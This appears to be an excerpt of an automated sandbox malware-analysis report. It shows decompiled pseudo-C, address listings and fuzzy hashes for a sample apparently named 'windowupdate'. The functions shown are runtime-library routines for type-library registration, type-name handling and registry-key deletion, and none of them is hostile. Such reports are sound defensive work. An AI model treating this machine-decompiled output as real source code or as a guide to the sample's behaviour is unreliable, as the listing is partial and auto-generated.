                      0x00d9c4cf
                      0x00000000
                      0x00d9c4b8
                      0x00d9c4a5
                      0x00000000
                      0x00d9c4a5
                      0x00d9c41a
                      0x00d9c41c
                      0x00d9c41f
                      0x00d9c421
                      0x00d9c427
                      0x00d9c429
                      0x00d9c42c
                      0x00d9c42e
                      0x00d9c433
                      0x00d9c434
                      0x00d9c436
                      0x00d9c438
                      0x00d9c438
                      0x00d9c444
                      0x00d9c449
                      0x00d9c44c
                      0x00d9c44c
                      0x00d9c44c
                      0x00d9c42c
                      0x00d9c427
                      0x00d9c44e
                      0x00d9c453
                      0x00d9c464
                      0x00d9c46c
                      0x00d9c46f
                      0x00d9c471
                      0x00d9c471
                      0x00d9c472
                      0x00d9c479
                      0x00d9c47a
                      0x00d9c47c
                      0x00000000
                      0x00d9c3df
                      0x00d9c3df
                      0x00d9c3e1
                      0x00d9c3e4
                      0x00d9c3e6
                      0x00d9c3ec
                      0x00d9c3ee
                      0x00d9c3f1
                      0x00d9c3f3
                      0x00d9c3f8
                      0x00d9c3f9
                      0x00d9c3fb
                      0x00d9c3fd
                      0x00d9c3fd
                      0x00d9c409
                      0x00d9c40e
                      0x00d9c3f1
                      0x00d9c3ec
                      0x00d9c411
                      0x00000000
                      0x00d9c411
                      0x00d9c3dd
                      0x00d9c37b
                      0x00000000
                      0x00000000
                      0x00d9c37d
                      0x00d9c380
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __wcstombs_l
                      • String ID: %ls$(((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$_mbsnbcpy_s_l$minkernel\crts\ucrt\src\desktopcrt\mbstring\mbsncpy_s.inl
                      • API String ID: 3007373345-974215673
                      • Opcode ID: 8d2fb4a4ab936424a8030620461c086753646f69557062c1d1cc1fea0f8b7bef
                      • Instruction ID: 93acd3f2b34811294c06082ecf5b9829e3c921c2edc39138cfc82b4ff233043f
                      • Opcode Fuzzy Hash: 8d2fb4a4ab936424a8030620461c086753646f69557062c1d1cc1fea0f8b7bef
                      • Instruction Fuzzy Hash: 05A1AA30B603565BCF316A2C8C55B7EBB55DF42728F2D626AE9609B2D2D671EC0083B1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D3B3D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 178libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 90%
                      			E00D3B3D0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v16;
				char _v28;
				intOrPtr _v36;
				signed int _v40;
				char _v564;
				char _v576;
				signed int _v584;
				signed int _v589;
				struct HINSTANCE__* _v600;
				intOrPtr _v604;
				signed int _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				void* _v620;
				signed int _t72;
				void* _t76;
				intOrPtr _t82;
				void* _t84;
				void* _t89;
				void* _t98;
				struct HINSTANCE__* _t101;
				_Unknown_base(*)()* _t103;
				signed char _t108;
				intOrPtr* _t152;
				void* _t154;
				void* _t160;
				void* _t161;
				signed int _t165;
				void* _t166;
				void* _t167;

				_t162 = __esi;
				_t120 = __ebx;
				_t160 =  &_v620;
				memset(_t160, 0xcccccccc, 0x9a << 2);
				_t167 = _t166 + 0xc;
				_t161 = _t160 + 0x9a;
				_t72 =  *0xdf600c; // 0x71e60372
				_v8 = _t72 ^ _t165;
				E00D32ED0( &_v16);
				E00D3E6E0( &_v28);
				_t76 = E00D3E760( &_v28);
				_v36 = E00D3A1D0(__ebx, _a4, _a8, E00D32F40( &_v16), _t76);
				if(_v36 < 0) {
					L18:
					_v616 = _v36;
					E00D36450( &_v28, __eflags);
					E00D330B0( &_v16, _t162);
					_t82 = _v616;
					L19:
					E00DC14C0(_t165, 0xd3b68c);
					_t84 = _t82;
					_t154 = _t152;
					return E00DC1520(E00D47280(_t84, _t120, _v8 ^ _t165, _t154, _t161, _t162), _t165 - _t167 + 0x268);
				}
				_v40 = 0;
				E00D32ED0( &_v576);
				_v620 = E00D3E710( &_v28);
				_t89 = E00D32F40( &_v576);
				_t162 = _t167;
				_t152 =  *((intOrPtr*)( *_v620 + 0x24));
				_v36 = E00DC1520( *_t152(_v620, 0xffffffff, 0, 0, 0, _t89), _t167 - _t167);
				_t172 = _v36;
				if(_v36 >= 0) {
					_t108 = E00D33000( &_v576, _t172, 0);
					_t173 = _t108 & 0x000000ff;
					if((_t108 & 0x000000ff) != 0) {
						E00D32720(__ebx, _t161, _t162, _t173,  &_v564, 0x104, _v576, E00D32EF0( &_v576, _t162));
						_t167 = _t167 + 0x10;
						_v604 = 0x206;
						if(_v604 >= 0x208) {
							E00D47730();
						}
						 *((short*)(_t165 + _v604 - 0x230)) = 0;
						_v608 = E00DBFE00(_t162,  &_v564) << 1;
						if(_v608 >= 0x208) {
							E00D47730();
						}
						 *((short*)(_t165 + _v608 - 0x230)) = 0;
						_t152 = 0;
						_v40 = _t165 + 0xfffffffffffffdd0;
					}
				}
				_v584 = 0;
				_v589 = 0;
				_v36 = E00D3A1A0( &_v589);
				_t177 = _v36;
				if(_v36 >= 0) {
					__eflags = (_v589 & 0x000000ff) - 1;
					if((_v589 & 0x000000ff) == 1) {
						_t101 = GetModuleHandleW(L"OLEAUT32.DLL");
						__eflags = _t167 - _t167;
						_v600 = E00DC1520(_t101, _t167 - _t167);
						__eflags = _v600;
						if(_v600 != 0) {
							_t103 = GetProcAddress(_v600, "RegisterTypeLibForUser");
							__eflags = _t167 - _t167;
							_v584 = E00DC1520(_t103, _t167 - _t167);
						}
					}
					__eflags = _v584;
					if(_v584 == 0) {
						_t152 = __imp__#163;
						_v584 = _t152;
					}
					_t162 = _t167;
					_t98 = _v584(E00D3E7B0( &_v28), E00D32F30( &_v16), _v40);
					__eflags = _t167 - _t167;
					_v36 = E00DC1520(_t98, _t167 - _t167);
					E00D330B0( &_v576, _t167);
					goto L18;
				}
				_t152 = _v36;
				_v612 = _t152;
				E00D330B0( &_v576, _t162);
				E00D36450( &_v28, _t177);
				E00D330B0( &_v16, _t162);
				_t82 = _v612;
				goto L19;
			}


































                      0x00d3b3d0
                      0x00d3b3d0
                      0x00d3b3db
                      0x00d3b3eb
                      0x00d3b3eb
                      0x00d3b3eb
                      0x00d3b3ed
                      0x00d3b3f4
                      0x00d3b3fa
                      0x00d3b402
                      0x00d3b40a
                      0x00d3b426
                      0x00d3b42d
                      0x00d3b63a
                      0x00d3b63d
                      0x00d3b646
                      0x00d3b64e
                      0x00d3b653
                      0x00d3b659
                      0x00d3b663
                      0x00d3b668
                      0x00d3b669
                      0x00d3b686
                      0x00d3b686
                      0x00d3b433
                      0x00d3b440
                      0x00d3b44d
                      0x00d3b459
                      0x00d3b45e
                      0x00d3b478
                      0x00d3b484
                      0x00d3b487
                      0x00d3b48b
                      0x00d3b499
                      0x00d3b4a1
                      0x00d3b4a3
                      0x00d3b4c8
                      0x00d3b4cd
                      0x00d3b4db
                      0x00d3b4eb
                      0x00d3b4ef
                      0x00d3b4ef
                      0x00d3b4fc
                      0x00d3b512
                      0x00d3b522
                      0x00d3b526
                      0x00d3b526
                      0x00d3b533
                      0x00d3b540
                      0x00d3b54a
                      0x00d3b54a
                      0x00d3b4a3
                      0x00d3b54d
                      0x00d3b557
                      0x00d3b56a
                      0x00d3b56d
                      0x00d3b571
                      0x00d3b5a9
                      0x00d3b5ac
                      0x00d3b5b5
                      0x00d3b5bb
                      0x00d3b5c2
                      0x00d3b5c8
                      0x00d3b5cf
                      0x00d3b5df
                      0x00d3b5e5
                      0x00d3b5ec
                      0x00d3b5ec
                      0x00d3b5cf
                      0x00d3b5f2
                      0x00d3b5f9
                      0x00d3b5fb
                      0x00d3b601
                      0x00d3b601
                      0x00d3b607
                      0x00d3b61f
                      0x00d3b625
                      0x00d3b62c
                      0x00d3b635
                      0x00000000
                      0x00d3b635
                      0x00d3b573
                      0x00d3b576
                      0x00d3b582
                      0x00d3b58a
                      0x00d3b592
                      0x00d3b597
                      0x00000000

                      APIs
                      • ~Module.VCCORLIBD ref: 00D3B58A
                      • GetModuleHandleW.KERNEL32(OLEAUT32.DLL,00000000), ref: 00D3B5B5
                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00D3B5DF
                        • Part of subcall function 00D32EF0: SysStringLen.OLEAUT32 ref: 00D32F07
                        • Part of subcall function 00D32720: __wcstombs_l.LIBCMTD ref: 00D32733
                      • ~Module.VCCORLIBD ref: 00D3B646
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D3B663
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Module$AddressCheckHandleProcStackStringVars@8__wcstombs_l
                      • String ID: OLEAUT32.DLL$RegisterTypeLibForUser
                      • API String ID: 1622416431-2666564778
                      • Opcode ID: eb3f477851e7bd9db1f5b22cbbbf3738a7d5c481d64726b8b8bb7a20c3c4590c
                      • Instruction ID: 213ad97996c3dea1693084ed8edb6506805a226a5171daca04c7304117ef22f9
                      • Opcode Fuzzy Hash: eb3f477851e7bd9db1f5b22cbbbf3738a7d5c481d64726b8b8bb7a20c3c4590c
                      • Instruction Fuzzy Hash: AE712D71D002289BCB24EB64DD5ABEDB7B4EF54310F1042A9E509B7291DB759E84CFB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D4C270 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148COMMON
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E00D4C270(intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				char _v6;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;

				_v32 = E00D4BF40(_a4);
				if(_v32 == 0) {
					_v44 = E00D4C030( &_v5);
					_v48 = E00D4C020( &_v6);
					E00D4BF60( &_v12, E00D5AC70(0, _a4 + 5, 0, _v48, _v44, 0x2800));
					if((E00D4BFE0( &_v12) & 0x000000ff) != 0) {
						_v16 = E00D82E00(E00D4C0C0( &_v12));
						while(_v16 != 0 &&  *((char*)(E00D4C0C0( &_v12) + _v16 - 1)) == 0x20) {
							 *((char*)(E00D4C0C0( &_v12) + _v16 - 1)) = 0;
							_v16 = _v16 - 1;
						}
						_v36 = _v16 + 1;
						_v56 = _v36 + 4;
						E00D4BF80( &_v20, E00D89580(_v56, 2, "d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcruntime\\src\\eh\\std_type_info.cpp", 0x66));
						if((E00D4C000( &_v20) & 0x000000ff) != 0) {
							_v24 = E00D4C0D0( &_v20);
							_v28 = _v24 + 4;
							_v64 = 0;
							 *_v24 = _v64;
							E00D82DE0(_v28, _v36, E00D4C0C0( &_v12));
							_v40 = E00D4BF20(_a4, _v28, 0);
							if(_v40 == 0) {
								E00D4C090( &_v20);
								__imp__InterlockedPushEntrySList(_a8, _v24);
								_v72 = _v28;
								E00D4BFC0( &_v20);
								E00D4BFA0( &_v12);
								return _v72;
							}
							_v68 = _v40;
							E00D4BFC0( &_v20);
							E00D4BFA0( &_v12);
							return _v68;
						}
						_v60 = 0;
						E00D4BFC0( &_v20);
						E00D4BFA0( &_v12);
						return _v60;
					}
					_v52 = 0;
					E00D4BFA0( &_v12);
					return _v52;
				}
				return _v32;
			}





















                      0x00d4c282
                      0x00d4c289
                      0x00d4c29b
                      0x00d4c2a6
                      0x00d4c2cd
                      0x00d4c2df
                      0x00d4c309
                      0x00d4c30c
                      0x00d4c332
                      0x00d4c33d
                      0x00d4c33d
                      0x00d4c348
                      0x00d4c351
                      0x00d4c36d
                      0x00d4c37f
                      0x00d4c3a8
                      0x00d4c3b1
                      0x00d4c3b6
                      0x00d4c3bf
                      0x00d4c3d2
                      0x00d4c3ec
                      0x00d4c3f3
                      0x00d4c413
                      0x00d4c420
                      0x00d4c429
                      0x00d4c42f
                      0x00d4c437
                      0x00000000
                      0x00d4c43c
                      0x00d4c3f8
                      0x00d4c3fe
                      0x00d4c406
                      0x00000000
                      0x00d4c40b
                      0x00d4c381
                      0x00d4c38b
                      0x00d4c393
                      0x00000000
                      0x00d4c398
                      0x00d4c2e1
                      0x00d4c2eb
                      0x00000000
                      0x00d4c2f0
                      0x00000000

                      APIs
                      Strings
                      • d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_type_info.cpp, xrefs: 00D4C356
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name___un
                      • String ID: d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_type_info.cpp
                      • API String ID: 3905892445-4032652797
                      • Opcode ID: a2ec06630e1a5d14abf739397300a650ea4d577b602c35f91a6ff5321a30b55b
                      • Instruction ID: d52ef2a05bb797adc55017bfdbdf3a59f957231ac7f392cb7fde4a3dba4fa4a1
                      • Opcode Fuzzy Hash: a2ec06630e1a5d14abf739397300a650ea4d577b602c35f91a6ff5321a30b55b
                      • Instruction Fuzzy Hash: DA5109B1D11108ABDB08EFA4D896AFEB7B4EF54304F404069E406B7291EB35AA45CFB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D3B1C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 138libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E00D3B1C0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v12;
				char _v24;
				intOrPtr _v32;
				char _v40;
				signed int _v48;
				signed int _v53;
				struct HINSTANCE__* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr* _v76;
				void _v80;
				void* _t62;
				intOrPtr _t68;
				void* _t70;
				void* _t82;
				void* _t87;
				struct HINSTANCE__* _t89;
				_Unknown_base(*)()* _t91;
				intOrPtr _t118;
				void* _t135;
				void* _t136;
				void* _t137;

				_t131 = __esi;
				memset( &_v80, 0xcccccccc, 0x13 << 2);
				_t137 = _t136 + 0xc;
				E00D32ED0( &_v12);
				E00D3E6E0( &_v24);
				_t62 = E00D3E760( &_v24);
				_v32 = E00D3A1D0(__ebx, _a4, _a8, E00D32F40( &_v12), _t62);
				if(_v32 < 0) {
					L10:
					_t118 = _v32;
					_v72 = _t118;
					E00D36450( &_v24, __eflags);
					E00D330B0( &_v12, _t131);
					_t68 = _v72;
					L11:
					_push(_t118);
					E00DC14C0(_t135, 0xd3b364);
					_t70 = _t68;
					return E00DC1520(_t70, _t135 - _t137 + 0x4c);
				}
				_v76 = E00D3E710( &_v24);
				_t131 = _t137;
				_v32 = E00DC1520( *((intOrPtr*)( *((intOrPtr*)( *_v76 + 0x1c))))(_v76,  &_v40), _t137 - _t137);
				if(_v32 < 0) {
					goto L10;
				}
				_v48 = 0;
				_v53 = 0;
				_v32 = E00D3A1A0( &_v53);
				_t143 = _v32;
				if(_v32 >= 0) {
					__eflags = (_v53 & 0x000000ff) - 1;
					if((_v53 & 0x000000ff) == 1) {
						_t89 = GetModuleHandleW(L"OLEAUT32.DLL");
						__eflags = _t137 - _t137;
						_v64 = E00DC1520(_t89, _t137 - _t137);
						__eflags = _v64;
						if(_v64 != 0) {
							_t91 = GetProcAddress(_v64, "UnRegisterTypeLibForUser");
							__eflags = _t137 - _t137;
							_v48 = E00DC1520(_t91, _t137 - _t137);
						}
					}
					__eflags = _v48;
					if(_v48 == 0) {
						_v48 = __imp__#186;
					}
					_t82 = _v48(_v40,  *(_v40 + 0x18) & 0x0000ffff,  *(_v40 + 0x1a) & 0x0000ffff,  *((intOrPtr*)(_v40 + 0x10)),  *((intOrPtr*)(_v40 + 0x14)));
					__eflags = _t137 - _t137;
					_v32 = E00DC1520(_t82, _t137 - _t137);
					_v80 = E00D3E710( &_v24);
					_t131 = _t137;
					_t87 =  *((intOrPtr*)( *((intOrPtr*)( *_v80 + 0x30))))(_v80, _v40);
					__eflags = _t137 - _t137;
					E00DC1520(_t87, __eflags);
					goto L10;
				}
				_t118 = _v32;
				_v68 = _t118;
				E00D36450( &_v24, _t143);
				E00D330B0( &_v12, _t131);
				_t68 = _v68;
				goto L11;
			}

























                      0x00d3b1c0
                      0x00d3b1d5
                      0x00d3b1d5
                      0x00d3b1da
                      0x00d3b1e2
                      0x00d3b1ea
                      0x00d3b206
                      0x00d3b20d
                      0x00d3b328
                      0x00d3b328
                      0x00d3b32b
                      0x00d3b331
                      0x00d3b339
                      0x00d3b33e
                      0x00d3b341
                      0x00d3b341
                      0x00d3b34b
                      0x00d3b350
                      0x00d3b361
                      0x00d3b361
                      0x00d3b21b
                      0x00d3b21e
                      0x00d3b239
                      0x00d3b240
                      0x00000000
                      0x00000000
                      0x00d3b246
                      0x00d3b24d
                      0x00d3b25a
                      0x00d3b25d
                      0x00d3b261
                      0x00d3b285
                      0x00d3b288
                      0x00d3b291
                      0x00d3b297
                      0x00d3b29e
                      0x00d3b2a1
                      0x00d3b2a5
                      0x00d3b2b2
                      0x00d3b2b8
                      0x00d3b2bf
                      0x00d3b2bf
                      0x00d3b2a5
                      0x00d3b2c2
                      0x00d3b2c6
                      0x00d3b2ce
                      0x00d3b2ce
                      0x00d3b2f5
                      0x00d3b2f8
                      0x00d3b2ff
                      0x00d3b30a
                      0x00d3b30d
                      0x00d3b31f
                      0x00d3b321
                      0x00d3b323
                      0x00000000
                      0x00d3b323
                      0x00d3b263
                      0x00d3b266
                      0x00d3b26c
                      0x00d3b274
                      0x00d3b279
                      0x00000000

                      APIs
                      • ~Module.VCCORLIBD ref: 00D3B26C
                        • Part of subcall function 00D330B0: SysFreeString.OLEAUT32 ref: 00D330C7
                      • GetModuleHandleW.KERNEL32(OLEAUT32.DLL,00000000), ref: 00D3B291
                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00D3B2B2
                      • ~Module.VCCORLIBD ref: 00D3B331
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D3B34B
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Module$AddressCheckFreeHandleProcStackStringVars@8
                      • String ID: OLEAUT32.DLL$UnRegisterTypeLibForUser
                      • API String ID: 1449819490-2196524522
                      • Opcode ID: 495e6f849a8bca6e68df0d3646d6eb0d706d5ad3ea451a25546c2c97fb9b0408
                      • Instruction ID: 663f5ea362d672193b481af0ddf6d3a6809888b89c6364a3b7b663b53adc71f8
                      • Opcode Fuzzy Hash: 495e6f849a8bca6e68df0d3646d6eb0d706d5ad3ea451a25546c2c97fb9b0408
                      • Instruction Fuzzy Hash: 8B515B76D002199FCB08EFA9D891AEEB7B4EF88310F108159E511B7291DB34AE45CFB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D383D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 112COMMON
                      Download Yara Rule
                      C-Code - Quality: 93%
                      			E00D383D0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v24;
				char _v44;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				intOrPtr _t60;
				void* _t62;
				void* _t64;
				intOrPtr _t68;
				intOrPtr _t78;
				intOrPtr _t97;
				void* _t101;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __esi;
				_t74 = __ebx;
				_push(__ecx);
				_t101 =  &_v92;
				memset(_t101, 0xcccccccc, 0x16 << 2);
				_t106 = _t105 + 0xc;
				_t102 = _t101 + 0x16;
				_pop(_t78);
				_v8 = _t78;
				E00D341C0( &_v24, 0);
				E00D3E200( &_v44);
				_v56 = 0;
				_t97 = _a8;
				_v64 = E00D38100(__ebx, _v8, _t97, _t101 + 0x16, __esi, _a12, _t97,  &_v44,  &_v56);
				_t110 = _v64;
				if(_v64 >= 0) {
					_t97 = _a4;
					E00D342A0( &_v24, _t97);
					_v68 = 2;
					__eflags = _a4;
					if(_a4 != 0) {
						__eflags = _v56;
						if(__eflags == 0) {
							_v88 = _v44;
						} else {
							_v88 = _v56;
						}
						_t97 = _v88;
						_v68 = E00D34A80(_t74,  &_v24, _t102, _t103, __eflags, _t97);
					}
					__eflags = _v68;
					if(__eflags != 0) {
						__eflags = _v68 - 2;
						if(__eflags != 0) {
							__eflags = _v68 - 3;
							if(__eflags != 0) {
								__eflags = _v56;
								if(__eflags == 0) {
									_v92 = _v44;
								} else {
									_v92 = _v56;
								}
								_t97 = _v92;
								_t64 = E00D3F1F0(0xf237ac);
								E00D323E0(_t74, _t102, _t103, __eflags, E00D323B0( &_v80, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x1ad), _t64, 0, "Failed to delete key %Ts or one of its subkeys\n", _t97);
								_t68 = E00D32E00( &_v80, __eflags, _v68);
								_t106 = _t106 + 0x18;
								_v64 = _t68;
							}
						}
					}
					E00D34260( &_v24);
					_v84 = _v64;
					E00D41F30( &_v44, __eflags);
					E00D34220( &_v24, __eflags);
					_t60 = _v84;
				} else {
					_v72 = _v64;
					E00D41F30( &_v44, _t110);
					E00D34220( &_v24, _t110);
					_t60 = _v72;
				}
				_push(_t97);
				E00DC14C0(_t104, 0xd38528);
				_t62 = _t60;
				return E00DC1520(_t62, _t104 - _t106 + 0x58);
			}
























                      0x00d383d0
                      0x00d383d0
                      0x00d383d7
                      0x00d383d8
                      0x00d383e5
                      0x00d383e5
                      0x00d383e5
                      0x00d383e7
                      0x00d383e8
                      0x00d383f0
                      0x00d383f8
                      0x00d383fd
                      0x00d3840c
                      0x00d3841c
                      0x00d3841f
                      0x00d38423
                      0x00d38443
                      0x00d3844a
                      0x00d3844f
                      0x00d38456
                      0x00d3845a
                      0x00d3845c
                      0x00d38460
                      0x00d3846d
                      0x00d38462
                      0x00d38465
                      0x00d38465
                      0x00d38470
                      0x00d3847c
                      0x00d3847c
                      0x00d3847f
                      0x00d38483
                      0x00d38485
                      0x00d38489
                      0x00d3848b
                      0x00d3848f
                      0x00d38491
                      0x00d38495
                      0x00d384a2
                      0x00d38497
                      0x00d3849a
                      0x00d3849a
                      0x00d384a5
                      0x00d384b5
                      0x00d384ce
                      0x00d384da
                      0x00d384df
                      0x00d384e2
                      0x00d384e2
                      0x00d3848f
                      0x00d38489
                      0x00d384e8
                      0x00d384f0
                      0x00d384f6
                      0x00d384fe
                      0x00d38503
                      0x00d38425
                      0x00d38428
                      0x00d3842e
                      0x00d38436
                      0x00d3843b
                      0x00d3843b
                      0x00d38506
                      0x00d38510
                      0x00d38515
                      0x00d38525

                      APIs
                      • std::exception::exception.LIBCMTD ref: 00D383F8
                        • Part of subcall function 00D38100: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D382EA
                      • ~Module.VCCORLIBD ref: 00D38436
                      • _Smanip.LIBCPMTD ref: 00D384C8
                      • ~Module.VCCORLIBD ref: 00D384FE
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D38510
                      Strings
                      • Failed to delete key %Ts or one of its subkeys, xrefs: 00D384A9
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00D384C0
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckModuleStackVars@8$Smanipstd::exception::exception
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$Failed to delete key %Ts or one of its subkeys
                      • API String ID: 2246551222-193758817
                      • Opcode ID: 588587a022eab65aff8b82a1c6e626ac6bc3dbb647e843afe7b033f07e46741c
                      • Instruction ID: 150a69afbbdd57a341cb8d2ac4846144dd653612e03ef8fd8b4b47221503de3d
                      • Opcode Fuzzy Hash: 588587a022eab65aff8b82a1c6e626ac6bc3dbb647e843afe7b033f07e46741c
                      • Instruction Fuzzy Hash: 9C411775D01249EBCB18EFD4E996AEEB7B5EF48300F144029F40267291DB746E49CB71
                      Uniqueness

                      Uniqueness Score: -1.00%

